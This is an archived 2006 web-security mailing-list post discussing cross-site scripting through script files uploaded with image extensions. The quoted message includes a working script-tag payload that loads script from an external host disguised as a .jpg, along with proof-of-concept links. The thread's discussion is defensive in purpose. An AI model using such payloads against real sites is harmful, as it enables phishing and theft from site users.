[WEB SECURITY] (XSS via file extension) XSS-Phishing on Financial Sites

RSnake rsnake at shocking.com
Mon Jun 26 16:13:22 EDT 2006


 	Sure, it's being treated as an HTML document because the MIME
type is being ignored since the JPEG header is missing.  But that's not
really much of an exploit since it requires the user to click on it
first.

 	It would require some social engineering to make that work, or
at the very least, you'd have to use an iframe or some other XSS exploit
to take advantage of the script you uploaded in place of an image,
unless I'm misunderstanding something.

 	But to answer your question, yes, anything that uploads content
should validate that the content is approved by any TOSs or AUPs in
place.  Unfortunately most people don't realize they need either of
those, so they are vulnerable to all kinds of things.  That kind of
reminds me of the long since fixed GDI+ exploit.  It's an easy thing to
detect and fix, but no one did it.  The closest I saw was a snort
signature that could be defeated by renaming the file.  Content filters
leave a little to be desired in most cases.

-RSnake
http://ha.ckers.org/
http://ha.ckers.org/xss.html
http://ha.ckers.org/blog/feed/

On Mon, 26 Jun 2006, Evans, Arian wrote:

>>  But to answer your question
>> <script src="http://ha.ckers.org/xss.jpg"></script>
>> will continue to work
>
> There's a couple of ways you can do this, as I'm sure
> you are aware, but I haven't seen this well documented
> in the past. This, for example, is all you need in IE:
>
> http://www.anachronic.com/xss/scriptalert.jpg
>
> Anywhere you can embed/reference an image, IE will execute
> script types it understands for image (any) extensions it has
> native shell extension handling configured to use itself for.
>
> If you can get the image to 'render' inline of an existing script,
> you may be able to get away with a simple directive as such:
>
> http://www.anachronic.com/xss/shortalert.jpg
>
> It's quite fun, and most web-based DMSes are vulnerable to
> this type of abuse, say *nothing* of the zillions of sites
> that allow custom avatars.
>
> This is definitely something the browser could kabosh
> short-term, though long term you'd think DMS systems would
> want to validate all user supplied data, including the
> /documents/ themselves.
>
> -ae

----------------------------------------------------------------------------
The Web Security Mailing List: 
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]



More information about the websecurity mailing list